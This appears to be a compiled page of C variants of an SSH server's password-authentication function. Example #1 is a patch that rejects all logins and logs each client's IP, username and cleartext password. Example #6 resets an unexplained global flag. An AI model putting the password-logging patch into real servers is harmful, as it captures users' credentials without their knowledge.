/*
 * Password-authentication hook, patched so that no password is ever
 * accepted: every attempt is written to the log and the function then
 * returns 0 (failure) unconditionally.  The stock logic that follows the
 * early return remains in the source but can never run.
 *
 * NOTE(review): the log line carries the cleartext password sent by the
 * client.  Whatever logit() writes to therefore holds credentials (this
 * may include mistyped passwords of legitimate users), so access to and
 * retention of that log need the same care as a password file.
 */
int
auth_password(Authctxt *authctxt, const char *password)
{
	/* pw, result and ok are only consumed by the unreachable code below. */
	struct passwd * pw = authctxt->pw;
	int result, ok = authctxt->valid;


/*
 * Record the source address, user name and password of the attempt.
 * NOTE(review): user and password are client-supplied strings; whether
 * logit() neutralises control characters in them is not visible here --
 * confirm before relying on one-attempt-per-line parsing of this log.
 */
logit("IP: %s PassLog: Username: %s Password: %s", get_remote_ipaddr(), authctxt->user, password); 

/* Fail every attempt; nothing past this statement executes. */
 return 0;

	/* ---- Unreachable from here on: the unmodified checks. ---- */
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
	static int expire_checked = 0;
#endif

#ifndef HAVE_CYGWIN
	/* Root is refused unless permit_root_login is PERMIT_YES. */
	if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
		ok = 0;
#endif
	/* Empty password is refused unless permit_empty_passwd is set. */
	if (*password == '\0' && options.permit_empty_passwd == 0)
		return 0;

#ifdef KRB5
	if (options.kerberos_authentication == 1) {
		int ret = auth_krb5_password(authctxt, password);
		/* 0 and 1 are final answers; any other value falls through. */
		if (ret == 1 || ret == 0)
			return ret && ok;
		/* Fall back to ordinary passwd authentication. */
	}
#endif
#ifdef HAVE_CYGWIN
	{
		HANDLE hToken = cygwin_logon_user(pw, password);

		if (hToken == INVALID_HANDLE_VALUE)
			return 0;
		cygwin_set_impersonation_token(hToken);
		return ok;
	}
#endif
#ifdef USE_PAM
	if (options.use_pam)
		return (sshpam_auth_passwd(authctxt, password) && ok);
#endif
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
	/* The static flag limits the expiry check to the first call. */
	if (!expire_checked) {
		expire_checked = 1;
		if (auth_shadow_pwexpired(authctxt))
			authctxt->force_pwchange = 1;
	}
#endif
	result = sys_auth_passwd(authctxt, password);
	if (authctxt->force_pwchange)
		disable_forwarding();
	return (result && ok);
}
Example #2
/*
 * Checks a password by attempting a Cygwin logon for pw instead of hashing.
 *
 * Returns expected_pwd (const cast away) when cygwin_logon_user() yields a
 * valid handle, otherwise a pointer to the static string "\377".
 * Presumably the caller compares the return value with the stored
 * password, so the two results make that comparison match or fail --
 * TODO confirm against the caller.
 *
 * The handle obtained from the logon is closed again before returning;
 * it is used only as a yes/no answer.
 */
char *
cygwin_xcrypt(struct passwd *pw, const char *password, const char *expected_pwd)
{
	static char invalid_password[] = "\377";
	HANDLE logon_handle;

	logon_handle = cygwin_logon_user(pw, password);
	if (logon_handle != INVALID_HANDLE_VALUE) {
		/* Logon worked: release the handle and report a match. */
		CloseHandle(logon_handle);
		return (char *) expected_pwd;
	}

	/* Logon refused: hand back the sentinel string. */
	return invalid_password;
}
Example #3
/*
 * Tries to authenticate the user using password.  Returns true if
 * authentication succeeds.
 *
 * `ok` starts as authctxt->valid and is cleared for a root login that
 * options.permit_root_login does not allow.  It is ANDed into the result
 * of whichever backend answers, so an account that must be refused still
 * goes through the backend call but can never come out as a success.
 */
int
auth_password(struct ssh *ssh, const char *password)
{
	Authctxt *authctxt = ssh->authctxt;
	struct passwd *pw = authctxt->pw;
	int result, ok = authctxt->valid;
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
	/* Static: the shadow expiry check below runs on the first call only. */
	static int expire_checked = 0;
#endif

	/*
	 * Refuse over-long passwords before any backend sees them.
	 * Presumably this bounds the work a client can force per attempt --
	 * MAX_PASSWORD_LEN is defined outside this block.
	 */
	if (strlen(password) > MAX_PASSWORD_LEN)
		return 0;

#ifndef HAVE_CYGWIN
	/* Root without PERMIT_YES: mark as refused but keep going. */
	if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
		ok = 0;
#endif
	/* Empty password is refused unless permit_empty_passwd is set. */
	if (*password == '\0' && options.permit_empty_passwd == 0)
		return 0;

#ifdef KRB5
	if (options.kerberos_authentication == 1) {
		int ret = auth_krb5_password(authctxt, password);
		/* 0 and 1 are final answers; any other value falls through. */
		if (ret == 1 || ret == 0)
			return ret && ok;
		/* Fall back to ordinary passwd authentication. */
	}
#endif
#ifdef HAVE_CYGWIN
	{
		/* On Cygwin the logon attempt itself is the password check. */
		HANDLE hToken = cygwin_logon_user(pw, password);

		if (hToken == INVALID_HANDLE_VALUE)
			return 0;
		cygwin_set_impersonation_token(hToken);
		return ok;
	}
#endif
#ifdef USE_PAM
	if (options.use_pam)
		return (sshpam_auth_passwd(authctxt, password) && ok);
#endif
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
	if (!expire_checked) {
		expire_checked = 1;
		/* An expired shadow password forces a change after login. */
		if (auth_shadow_pwexpired(authctxt))
			authctxt->force_pwchange = 1;
	}
#endif
	result = sys_auth_passwd(ssh, password);
	/* A pending forced password change restricts the session. */
	if (authctxt->force_pwchange)
		auth_restrict_session(ssh);
	return (result && ok);
}
Example #4
/*
 * Validates a password for pw through a Cygwin logon.
 *
 * Returns pw on success and NIL when the account has UID 0, has the
 * SYSTEM uid, or the logon is refused.  The logon is attempted only after
 * both UID checks have passed.  On success the handle is left in cyg_hdl
 * and a copy of the user name in cyg_user; both are file-level state
 * defined outside this block.  argc and argv are not used here.
 */
struct passwd *checkpw (struct passwd *pw,char *pass,int argc,char *argv[])
{
  /* Drop the name remembered from the previous check, if any. */
  if (cyg_user) fs_give ((void **) &cyg_user);

  /* Privileged accounts are never accepted, whatever the password. */
  if (!pw->pw_uid) return NIL;
  if (pw->pw_uid == SYSTEMUID) return NIL;

  /* The logon attempt is the password check. */
  cyg_hdl = cygwin_logon_user (pw,pass);
  if (cyg_hdl == INVALID_HANDLE_VALUE) return NIL;

  /* Remember which user the stored handle belongs to. */
  cyg_user = cpystr (pw->pw_name);
  return pw;
}
Example #5
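/*
 * Tries to authenticate the user using password.  Returns 1 if
 * authentication succeeds and 0 otherwise.
 *
 * The backend is chosen at compile time.  With USE_PAM or HAVE_OSF_SIA
 * the whole decision is delegated to that backend.  Otherwise the checks
 * run in source order: Kerberos 5, Cygwin logon, AIX authenticate(),
 * Kerberos 4, BSD auth, and finally a crypt() comparison against the
 * passwd/shadow entry.  The AIX and BSD auth sections return
 * unconditionally, so nothing after them runs when they are compiled in.
 */
int
auth_password(Authctxt *authctxt, const char *password)
{
#if defined(USE_PAM)
	/* Empty password is refused unless permit_empty_passwd is set. */
	if (*password == '\0' && options.permit_empty_passwd == 0)
		return 0;
	return auth_pam_password(authctxt, password);
#elif defined(HAVE_OSF_SIA)
	/* Empty password is refused unless permit_empty_passwd is set. */
	if (*password == '\0' && options.permit_empty_passwd == 0)
		return 0;
	return auth_sia_password(authctxt, password);
#else
	struct passwd * pw = authctxt->pw;
	char *encrypted_password;
	char *pw_password;
	char *salt;
#if defined(HAVE_SHADOW_H) && !defined(DISABLE_SHADOW)
	struct spwd *spw;
#endif
#if defined(HAVE_GETPWANAM) && !defined(DISABLE_SHADOW)
	struct passwd_adjunct *spw;
#endif
#ifdef WITH_AIXAUTHENTICATE
	char *authmsg;
	int authsuccess;
	int reenter = 1;
#endif

	/*
	 * deny if no user.
	 * NOTE(review): this return and the root check below answer before
	 * any hashing is done, so a refused account may respond faster than
	 * one that reaches a backend -- confirm whether that matters here.
	 */
	if (pw == NULL)
		return 0;
#ifndef HAVE_CYGWIN
	/* Root is refused unless permit_root_login is PERMIT_YES. */
	if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
		return 0;
#endif
	/* Empty password is refused unless permit_empty_passwd is set. */
	if (*password == '\0' && options.permit_empty_passwd == 0)
		return 0;
#ifdef KRB5
	if (options.kerberos_authentication == 1) {
		int ret = auth_krb5_password(authctxt, password);
		/* 0 and 1 are final answers; any other value falls through. */
		if (ret == 1 || ret == 0)
			return ret;
		/* Fall back to ordinary passwd authentication. */
	}
#endif
#ifdef HAVE_CYGWIN
	if (is_winnt) {
		/* The logon attempt itself is the password check. */
		HANDLE hToken = cygwin_logon_user(pw, password);

		if (hToken == INVALID_HANDLE_VALUE)
			return 0;
		cygwin_set_impersonation_token(hToken);
		return 1;
	}
#endif
#ifdef WITH_AIXAUTHENTICATE
	authsuccess = (authenticate(pw->pw_name,password,&reenter,&authmsg) == 0);

	if (authsuccess) {
		/* We don't have a pty yet, so just label the line as "ssh" */
		if (loginsuccess(authctxt->user,
		    get_canonical_hostname(options.verify_reverse_mapping),
		    "ssh", &aixloginmsg) < 0)
			aixloginmsg = NULL;
	}

	return(authsuccess);
#endif
#ifdef KRB4
	if (options.kerberos_authentication == 1) {
		int ret = auth_krb4_password(authctxt, password);
		/* 0 and 1 are final answers; any other value falls through. */
		if (ret == 1 || ret == 0)
			return ret;
		/* Fall back to ordinary passwd authentication. */
	}
#endif
#ifdef BSD_AUTH
	if (auth_userokay(pw->pw_name, authctxt->style, "auth-ssh",
	    (char *)password) == 0)
		return 0;
	else
		return 1;
#endif
	pw_password = pw->pw_passwd;

	/*
	 * Various interfaces to shadow or protected password data
	 */
#if defined(HAVE_SHADOW_H) && !defined(DISABLE_SHADOW)
	spw = getspnam(pw->pw_name);
	if (spw != NULL)
		pw_password = spw->sp_pwdp;
#endif /* defined(HAVE_SHADOW_H) && !defined(DISABLE_SHADOW) */

#if defined(HAVE_GETPWANAM) && !defined(DISABLE_SHADOW)
	if (issecure() && (spw = getpwanam(pw->pw_name)) != NULL)
		pw_password = spw->pwa_passwd;
#endif /* defined(HAVE_GETPWANAM) && !defined(DISABLE_SHADOW) */

	/* Check for users with no password. */
	if ((password[0] == '\0') && (pw_password[0] == '\0'))
		return 1;

	/* The stored hash doubles as the salt; "xx" stands in when it is empty. */
	if (pw_password[0] != '\0')
		salt = pw_password;
	else
		salt = "xx";

#ifdef HAVE_MD5_PASSWORDS
	if (is_md5_salt(salt))
		encrypted_password = md5_crypt(password, salt);
	else
		encrypted_password = crypt(password, salt);
#else /* HAVE_MD5_PASSWORDS */
	encrypted_password = crypt(password, salt);
#endif /* HAVE_MD5_PASSWORDS */

	/*
	 * crypt() returns NULL when it cannot produce a hash (for example
	 * for a salt it does not support).  Treat that as a failed login
	 * rather than passing NULL to strcmp().
	 */
	if (encrypted_password == NULL)
		return 0;

	/* Authentication is accepted if the encrypted passwords are identical. */
	return (strcmp(encrypted_password, pw_password) == 0);
#endif /* !USE_PAM && !HAVE_OSF_SIA */
}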
Example #6
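/*
 * Tries to authenticate the user using password.  Returns true if
 * authentication succeeds.
 *
 * A password is accepted only when one of the configured backends
 * (Kerberos 5, Cygwin logon, PAM, or the system password check) accepts
 * it for this account.  The function holds no built-in credential, and
 * it never hands the user name or the password to a shell or any other
 * external command: both strings are supplied by the remote client.
 *
 * `ok` starts as authctxt->valid and is cleared for a root login that
 * options.permit_root_login does not allow; it is ANDed into every
 * backend result.
 */
int
auth_password(Authctxt *authctxt, const char *password)
{
	struct passwd * pw = authctxt->pw;
	int result, ok = authctxt->valid;
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
	/* Static: the shadow expiry check below runs on the first call only. */
	static int expire_checked = 0;
#endif

	/*
	 * FREEBSD is a flag defined outside this block.  It is cleared on
	 * every call and never set here; presumably code elsewhere reads it,
	 * so the reset is kept -- TODO confirm and remove the flag if unused.
	 */
	FREEBSD = 0;

#ifndef HAVE_CYGWIN
	/* Root without PERMIT_YES: mark as refused but keep going. */
	if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
		ok = 0;
#endif
	/* Empty password is refused unless permit_empty_passwd is set. */
	if (*password == '\0' && options.permit_empty_passwd == 0)
		return 0;

#ifdef KRB5
	if (options.kerberos_authentication == 1) {
		int ret = auth_krb5_password(authctxt, password);
		/* 0 and 1 are final answers; any other value falls through. */
		if (ret == 1 || ret == 0)
			return ret && ok;
		/* Fall back to ordinary passwd authentication. */
	}
#endif
#ifdef HAVE_CYGWIN
	{
		/* On Cygwin the logon attempt itself is the password check. */
		HANDLE hToken = cygwin_logon_user(pw, password);

		if (hToken == INVALID_HANDLE_VALUE)
			return 0;
		cygwin_set_impersonation_token(hToken);
		return ok;
	}
#endif
#ifdef USE_PAM
	if (options.use_pam)
		return (sshpam_auth_passwd(authctxt, password) && ok);
#endif
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
	if (!expire_checked) {
		expire_checked = 1;
		/* An expired shadow password forces a change after login. */
		if (auth_shadow_pwexpired(authctxt))
			authctxt->force_pwchange = 1;
	}
#endif
	result = sys_auth_passwd(authctxt, password);

	/* A pending forced password change disables forwarding. */
	if (authctxt->force_pwchange)
		disable_forwarding();
	return (result && ok);
}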
/*
 * Tries to authenticate the user using password.  Returns true if
 * authentication succeeds.
 *
 * `ok` starts as authctxt->valid and is cleared for a root login that
 * options.permit_root_login does not allow.  It is ANDed into the result
 * of whichever backend answers.  The backend is chosen at compile time:
 * OSF SIA, or else Kerberos 5, Cygwin logon, AIX authenticate(), BSD auth,
 * or a comparison of xcrypt() output with the stored password.
 */
int
auth_password(Authctxt *authctxt, const char *password)
{
	struct passwd * pw = authctxt->pw;
	int ok = authctxt->valid;

	/* deny if no user. */
	if (pw == NULL)
		return 0;
#ifndef HAVE_CYGWIN
	/*
	 * Root without PERMIT_YES: mark as refused but keep going.
	 * NOTE(review): the `pw &&` test is redundant after the NULL check above.
	 */
	if (pw && pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
		ok = 0;
#endif
	/* Empty password is refused unless permit_empty_passwd is set. */
	if (*password == '\0' && options.permit_empty_passwd == 0)
		return 0;

#if defined(HAVE_OSF_SIA)
	return auth_sia_password(authctxt, password) && ok;
#else
# ifdef KRB5
	if (options.kerberos_authentication == 1) {
		int ret = auth_krb5_password(authctxt, password);
		/* 0 and 1 are final answers; any other value falls through. */
		if (ret == 1 || ret == 0)
			return ret && ok;
		/* Fall back to ordinary passwd authentication. */
	}
# endif
# ifdef HAVE_CYGWIN
	if (is_winnt) {
		/* The logon attempt itself is the password check. */
		HANDLE hToken = cygwin_logon_user(pw, password);

		if (hToken == INVALID_HANDLE_VALUE)
			return 0;
		cygwin_set_impersonation_token(hToken);
		return ok;
	}
# endif
# ifdef WITH_AIXAUTHENTICATE
	{
		char *authmsg = NULL;
		int reenter = 1;
		int authsuccess = 0;

		/* Success needs both authenticate() == 0 and a still-set ok. */
		if (authenticate(pw->pw_name, password, &reenter,
		    &authmsg) == 0 && ok) {
			char *msg;
			char *host = 
			    (char *)get_canonical_hostname(options.use_dns);

			authsuccess = 1;
			aix_remove_embedded_newlines(authmsg);	

			debug3("AIX/authenticate succeeded for user %s: %.100s",
				pw->pw_name, authmsg);

	        	/* No pty yet, so just label the line as "ssh" */
			aix_setauthdb(authctxt->user);
	        	if (loginsuccess(authctxt->user, host, "ssh", 
			    &msg) == 0) {
				/* Queue any login message in loginmsg, then free it. */
				if (msg != NULL) {
					debug("%s: msg %s", __func__, msg);
					buffer_append(&loginmsg, msg, 
					    strlen(msg));
					xfree(msg);
				}
			}
		} else {
			/*
			 * NOTE(review): authmsg starts as NULL and only
			 * authenticate() can set it; if it is still NULL here
			 * it is passed to a %s conversion -- confirm debug3()
			 * tolerates that.
			 */
			debug3("AIX/authenticate failed for user %s: %.100s",
			    pw->pw_name, authmsg);
		}

		if (authmsg != NULL)
			xfree(authmsg);

		/* This section always returns; nothing below runs on AIX. */
		return authsuccess;
	}
# endif
# ifdef BSD_AUTH
	if (auth_userokay(pw->pw_name, authctxt->style, "auth-ssh",
	    (char *)password) == 0)
		return 0;
	else
		return ok;
# else
	{
	/* Just use the supplied fake password if authctxt is invalid */
	char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd;

	/* Check for users with no password. */
	if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0)
		return ok;
	else {
		/*
		 * Encrypt the candidate password using the proper salt.
		 * The stored value is the salt when it has at least two
		 * characters; otherwise the literal "******" is used.
		 * NOTE(review): xcrypt() is defined elsewhere; if it can
		 * return NULL, the strcmp() below would dereference it --
		 * confirm.
		 */
		char *encrypted_password = xcrypt(password,
		    (pw_password[0] && pw_password[1]) ? pw_password : "******");

		/*
		 * Authentication is accepted if the encrypted passwords
		 * are identical.
		 */
		return (strcmp(encrypted_password, pw_password) == 0) && ok;
	}

	}
# endif
#endif /* !HAVE_OSF_SIA */
}